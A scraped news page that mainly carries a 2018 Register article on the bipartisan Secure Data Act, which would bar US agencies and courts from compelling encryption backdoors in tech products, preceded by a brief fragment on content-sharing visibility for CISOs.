Visibility in computer security is vital. By having reporting tools for content sharing, CISOs can help senior management understand the risks and benefits of allowing sharing methods, whether they’re USB drives or cloud services.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cEyMI0ABAGg/

New law would stop Feds from demanding encryption backdoor

US lawmakers from both major political parties came together on Thursday to reintroduce a bill that, if passed, would prohibit the American government from forcing tech product makers to undermine the security of their wares.

The bill, known as the Secure Data Act of 2018, was returned to the US House of Representatives by Representatives Zoe Lofgren (D-CA) and Thomas Massie (R-KY), with the support of Jerrold Nadler (D-NY), Ted Poe (R-TX), Ted Lieu (D-CA) and Matt Gaetz (R-FL), cosponsors of a past failed version of the bill from 2014 and a similarly ill-fated 2015 successor.

In the US Senate in 2014 and 2015, Sen. Ron Wyden (D-OR) sponsored parallel versions of the bill; a Senate equivalent has yet to be floated for this legislative term.

The Secure Data Act forbids any government agency from demanding that “a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency.”

It also prohibits courts from issuing orders to compel access to data.

Covered products include computer hardware, software, or electronic devices made available to the public.

The bill makes an exception for telecom companies, which under the 1994 Communications Assistance for Law Enforcement Act (CALEA) would still have to help law enforcement agencies access their communication networks.

Though not specifically mentioned in the legislative text, this is a bill to protect the integrity of encryption systems.

After the FBI in 2015 faced delays accessing the iPhone used by mass shooter Syed Rizwan Farook, law enforcement officials became more vocal about concerns that encryption can leave investigators in the dark.

Though authorities fought and lost this battle in the early 1990s when they tried to mandate adoption of a backdoored chip, the Clipper Chip, they’ve not conceded. The argument also came up after the September 11 atrocity but was shot down on practical grounds.

But for the last few years the FBI has been pushing for backdoors again. Last month Ray Ozzie, designer of Lotus Notes and the former CTO of Microsoft, proposed a similar key escrow scheme, reviving hope among backdoor supporters that security and insecurity can safely coexist. Ozzie’s ideas have been panned by experts.

In a speech on Monday, Attorney General Jeff Sessions said it is “critical that we deal with the growing encryption or the ‘going dark’ problem.”

Thus backdoor skeptics have returned to do battle again.

“Encryption backdoors put the privacy and security of everyone using these compromised products at risk,” said Lofgren in a statement.

“It is troubling that law enforcement agencies appear to be more interested in compelling US companies to weaken their product security than using already available technological solutions to gain access to encrypted devices and services.”

Lofgren argues that encryption backdoors represent a demonstrated security risk and that they harm US companies and jobs by making American tech products less secure and thus less competitive on the global market. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/10/proposed_law_would_stop_feds_from_demanding_backdoors/